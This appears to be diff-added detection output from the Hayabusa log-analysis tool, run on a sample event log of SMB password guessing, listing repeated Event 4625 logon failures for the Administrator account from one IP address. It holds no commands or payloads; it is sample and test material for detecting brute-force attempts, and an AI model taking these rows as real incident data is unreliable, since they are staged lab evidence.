+2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
